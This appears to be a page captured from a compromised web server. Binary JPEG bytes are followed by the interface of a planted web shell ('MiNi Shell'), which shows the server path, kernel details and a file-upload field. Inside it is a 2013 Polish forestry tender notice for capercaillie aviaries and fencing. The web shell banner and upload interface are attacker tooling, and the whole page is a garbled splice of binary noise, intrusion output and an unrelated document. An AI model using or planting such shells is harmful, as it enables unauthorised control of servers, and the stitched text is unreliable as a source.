JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/325450-N-2013.html

<p class="kh_header"><b>Giby: Przygotowanie powierzchni adaptacyjnej i wolier w Nadleśnictwie Głęboki Bród w 2013 roku realizowane w ramach projektu LIFE11 NAT/PL/428 Czynna ochrona nizinnych populacji głuszca w Borach Dolnośląskich i Puszczy Augustowskiej.</b><br>
<b>Numer ogłoszenia: 325450 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe reprezentujące Skarb Państwa Nadleśnictwo Głęboki Bród , Głęboki Bród 4, 16-506 Giby, woj. podlaskie, tel. 087 5165203, 5165231, faks 087 5165203, 5165231.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.lasy.gov.pl/web/gleboki_brod</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej - PGL LP.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie powierzchni adaptacyjnej i wolier w Nadleśnictwie Głęboki Bród w 2013 roku realizowane w ramach projektu LIFE11 NAT/PL/428 Czynna ochrona nizinnych populacji głuszca w Borach Dolnośląskich i Puszczy Augustowskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PROJEKT
1. Wymagania dotyczące woliery adaptacyjnej szt. 4:
- woliera dwuczęściowa połączona w kształcie cyfry osiem o pow. około 70m2 każda
- konstrukcja ścian bocznych z elementów prostokątnych o wymiarach 2,50m x 1,00m z
  desek iglastych o wymiarach 10cm x 2,5cm podwójnych wypełnionych siatką 
  heksegonalną powlekaną w kolorze zielonym o oczku nie większym niż 20mm, 
  skręcanych wkrętami do drewna, przymocowanych do słupków dębowych średnicy 10-
  12cm wkopanych w grunt na głębokość minimum 50cm, za pomocą opasek
  ocynkowanych. Każda część  woliery składa się z 11 elementów w tym 2 elementy są
  wspólne, kształt woliery owalny
- dodatkowo do każdej części woliery bramka wejściowa o wymiarach 0,80m x 1,30m
  wypełniona siatką heksegonalną jak wyżej, zamontowana do słupków za pomocą
  zawiasów
  składanych wyposażona w dwa zamknięcia od zewnątrz i wewnątrz
- dodatkowo w elemencie wspólnym klapa do komunikacji pomiędzy częściami woliery
  o  wymiarach 40cm x 50cm zamocowana na zawiasach składanych podnoszona do góry
  wykonana w ten sam sposób co elementy ogrodzenia
- każda część woliery z góry przykryta siatką ornitologiczną o oczkach 30mm x 30mm w
  kolorze czarnym lekko spadzista w najwyższym miejscu ok. 2,5m nad ziemią podparta
  w środkowej części woliery słupkiem drewnianym 
- ściany woliery zabezpieczone przed drapieżnikami od zewnątrz elektryzatorem
  elektrycznym akumulatorowym o napięciu jałowym 10000V, energii impulsowej 
  3000mJ, trzema rzędami linki ocynkowanej średnicy 2mm do elektryzatorów
  elektrycznych osadzonej na izolatorach wkręcanych w elementy ogrodzenia, rozstaw
  linek do uzgodnienia podczas montażu
- zasilanie elektryzatora elektrycznego z zestawu dwóch akumulatorów 12V, pojemności
  45Ah (jeden awaryjny)
- dodatkowo woliera zabezpieczona przed wkopaniem od zewnątrz dwoma deskami 
  iglastymi o wymiarach 15cm x 2,5cm, w tym jedna ułożona jest poziomo na gruncie 
  przy elemencie ogrodzenia , natomiast druga jest wkopana pionowo w grunt za deska
  poziomą.
Załącznik rysunki wykonawcze.

2. Wymagania dotyczące woliery sanitarnej szt. 1:
- woliera sanitarna wykonana w ten sam sposób jak woliera adaptacyjna z elementów w 
  kształcie trapezu o wymiarach 0,80m x 2,50m x 2,80m x 2,50m
- dodatkowo wyposażona w dwie bramki wejściowe o wymiarach 0,80m x 1,00m 
  zamontowanych do słupków za pomocą zawiasów składanych, wyposażona w dwa
  zamknięcia od zewnątrz i wewnątrz
- dodatkowo woliera sanitarna wyposażona jest w pomieszczenie izolatki wykonane z
  desek iglastych grubości 2,5cm od wewnątrz  (podłoga, ściany i dach) na powierzchni
  woliery, z tym ze ściana czołowa przesunięta jest o 60cm,  który stanowi wybieg
  woliery
- zadaszenie woliery z desek umocowanych na zakład w kierunku spadku wystaje poza 
  obrys woliery minimum 15cm 
- w ścianie czołowej klapa o wymiarach 40cm x 40cm stanowiąca wejście do izolatki
- zabezpieczenie woliery przed drapieżnikami takie same jak przy wolierze
  adaptacyjnej.
Załącznik rysunki wykonawcze.

3. Zadaszenia do karmienia ptaków szt. 12:
 - zadaszenia przenośne o wymiarach 0,50m x 1,0m z krawędziaków 4cm x 4cm 
   wysokości 0,55m, przykryte daszkiem z desek 2,5cm przybitych na zakład w stronę 
   spadku, spadek  minimum 15 stopni, daszek wystający minimum 10-15cm poza obrys
   zadaszenia.
Załącznik rysunki wykonawcze.

4. Powierzchnia adaptacyjna wewnętrzna szt. 1 w oddziale 597a: 
- powierzchnia w kształcie jak najbardziej zbliżonym do kwadratu o wymiarach 80m x 
  80m 
- zabezpieczona jednym rzędem fladr na wysokości 80cm od gruntu, zamocowanych na
  słupkach kwadratowych  iglastych o wymiarach 6-8cm wbitych w grunt, długość
  słupków 1,50m, rozstaw słupków 4-5m
- fladry wykonane z materiału w dwóch kolorach żółtym i czerwonym o wymiarach 
  50cm x  20cm, zamocowane naprzemiennie do taśmy 
- dodatkowe zabezpieczenie elektryzatorem elektrycznym akumulatorowym o napięciu
  jałowym 10000V, energii impulsowej 3000mJ, dwoma rzędami linki ocynkowanej 
  średnicy 2mm do elektryzatorów elektrycznych osadzonej na izolatorach wkręconych w
  słupki, rozstaw linek do uzgodnienia podczas montażu
- zasilanie elektryzatora elektrycznego z zestawu dwóch akumulatorów 12V, pojemności
  45Ah (jeden awaryjny)
- dodatkowo ułożona pod linkami elektryzatora elektrycznego na gruncie warstwa
  geowłókniny szerokości 0,50m stabilizowana szpilkami metalowymi
- z powierzchni adaptacyjnej należy usunąć podrosty/podszyty czeremchy amerykańskiej 
- usunięte krzewy wywieźć przynajmniej na odległość 1km od powierzchni adaptacyjnej 
  w miejsce wskazane przez zamawiającego
- granice powierzchni w miejscach gdzie będzie ułożona geowłóknina i ustawione fladry
   wraz z elektryzatorem elektrycznym należy przerobić kruszarką leśną.     

5. Powierzchnia adaptacyjna zewnętrzna szt. 1 w oddziale 597a: 
- powierzchnia w kształcie jak najbardziej zbliżonym do kwadratu o wymiarach 130m x 
  130m  minus powierzchnia wewnętrzna o wymiarach 80m x 80m 
- zabezpieczona jednym rzędem fladr na wysokości 80cm od gruntu, zamocowanych na
  słupkach kwadratowych  iglastych o wymiarach 6cm-8cm wbitych w grunt, długość
  słupków 1,50m, rozstaw słupków 4-5m
- dodatkowe zabezpieczenie elektryzatorem elektrycznym akumulatorowym o napięciu
  jałowym 10000V, energii impulsowej 3000mJ, dwoma rzędami linki ocynkowanej 
  średnicy
  2mm do elektryzatorów elektrycznych osadzonej na izolatorach wkręconych w słupki,
  rozstaw linek do uzgodnienia podczas montażu
- zasilanie elektryzatora elektrycznego z zestawu dwóch akumulatorów 12V, pojemności 
  45Ah (jeden awaryjny)
- dodatkowo ułożona pod linkami elektryzatora elektrycznego na gruncie warstwa
  geowłókniny szerokości 0,50m stabilizowana szpilkami metalowymi
- z powierzchni adaptacyjnej należy usunąć podrosty/podszyty czeremchy amerykańskiej 
- usunięte krzewy wywieźć przynajmniej na odległość 1km od powierzchni adaptacyjnej 
  w miejsce wskazane przez zamawiającego
- granice powierzchni w miejscach gdzie będzie ułożona geowłóknina i ustawione fladry
   wraz z elektryzatorem elektrycznym należy przerobić kruszarką leśną.     

6. Ambona obserwacyjna - czatownia szt. 1:
- konstrukcja pod ambonę w kształcie kwadratu z czterech słupów z drewna okrągłego
  średnicy 15-18cm osadzonych w gruncie wraz z stężeniami w kształcie stożka ściętego
  wysokości 2,5m, na górze konstrukcji wykonany stelaż do posadowienia pomieszczenia
  ambony
- ambona konstrukcji szkieletowej drewnianej przymocowana do stelażu, obita deskami
  grubości 2,5cm na zakład w poziomie o wymiarach 2,00m x 2,00m wraz z spocznikiem
  szerokości 1,00m o wysokości 2,20/2,00m, przykryta dachem jednospadowym opartym 
  na  krokwiach z desek 2,5cm na styk wystającym minimum 25cm poza obrys ambony 
  wraz z spocznikiem,
- pokrycie dachu z papy asfaltowej nawierzchniowej zgrzewalnej grubości 3,7mm
- podłoga z desek 3,2cm na styk przymocowana do legarów umocowanych do stelażu
- drzwi wejściowe do ambony od strony spocznika z desek grubości 2,5cm przybitych na
  zakład w pionie wraz z okuciami (zawiasy składane i zamknięcie od strony zewnętrznej
  i wewnętrznej) o wymiarach 0,80m x 2,00m
- w pozostałych trzech ścianach ambony wykonane otwory obserwacyjne o wymiarach 
  1,20m x 0,40m zasuwane okiennicami i wyposażone w siatkę maskującą otwory, 
  poziom posadowienia otworów na wysokości 1,40m od podłogi
- wejście na ambonę w postaci schodów drabiniastych, szerokości 0,60m wraz z poręczą
  schodową  
- na spoczniku balustrada z żerdzi poziomych z dwóch stron
Załącznik rysunki wykonawcze.

7. Przygotowanie terenu pod posadowienie garażu metalowego składanego, oraz 
    jego posadowienie.
- przygotowanie powierzchni w miejscu wskazanym przez Zamawiającego na zewnątrz
  powierzchni adaptacyjnej
- zdjęcie warstwy runa leśnego wraz z humusem o wymiarach 3,50m x 6,00m gr. do 
  20cm wraz z odwiezieniem na odległość do 1km 
- wykonanie podsypki piaskowej grubości 15cm
- ułożenie na podsypce piaskowej płytek chodnikowych betonowych o wymiarach 50 x 
  50 x 7 cm
- posadowienie garażu metalowego dostarczonego przez Zamawiającego. 

Uwagi:  
- wszystkie elementy drewniane należy zaimpregnować środkami grzybobójczymi
  solnymi.
- do zabezpieczenia powierzchni adaptacyjnych i wolier należy przyjąć jeden
  elektryzator elektryczny akumulatorowy wraz z zestawem 2 akumulatorów o
  parametrach podanych powyżej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 1 400.00 PLN (słownie:  jeden tysiąc czterysta  00/100 PLN).
2.	Wadium należy wnieść w terminie do dnia 2013-08-26 do godz. 10:00.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu: przelewem na rachunek bankowy Zamawiającego: PKO BP S.A. O/Suwałki 37 1020 1332 0000 1002 0190 2378;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z dnia 2007r. nr 42, poz. 275 z późn. zm.).
4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5.	Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
6.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.).
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b.	nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlega ocenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Wykonawca musi wykazać, że zrealizował (rozpoczął i zakończył) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwie) roboty budowlane każda odpowiadające swoim rodzajem i o wartości nie mniejszej każda niż 50 tys. złotych z podatkiem VAT, robotom budowlanym stanowiącym przedmiot zamówienia. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlega ocenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlega ocenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie podlega ocenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach: 
1. W przypadku konieczności zmiany terminu wykonania przedmiotu umowy na skutek:
a) wystąpienia warunków atmosferycznych uniemożliwiających wykonanie przedmiotu umowy w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość przedmiotu umowy;
b) wystąpienia konieczności wykonania robót dodatkowych;
Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego i
podpisanego przez przedstawicieli Zamawiającego oraz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_gleboki_brod/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Głęboki Bród;  Głęboki Bród 4;  16-506 Giby Pokój nr 10 transport.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2013 godzina 10:00, miejsce: Nadleśnictwo Głęboki Bród;  Głęboki Bród 4;  16-506 Giby Pokój 4 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Czynna ochro a nizinnych populacji głuszca (Tetrao urogallus L.) na terenie Borów w Dolnośląskich i Puszczy Augustowskiej (Active protection of lowla d populations of Capercaillie in the Bory Dolnośląskie Forest a d Augustowska Primeval Forest) - oznaczonego dla potrzeb Instrumentu Finansowego dla Środowiska LIFE+ nr LIFE11 NAT/PL/428 oraz wykorzystania rozliczenia dotacji ze środków Wspólnoty Europejskiej udzielonej na podstawie stosownej umowy o nr LIFE11 NAT/PL/428 oraz ze środków w Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej udzielonej n podstawie umowy o nr 716/2012/Wn50/OP-RE-LF/D..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com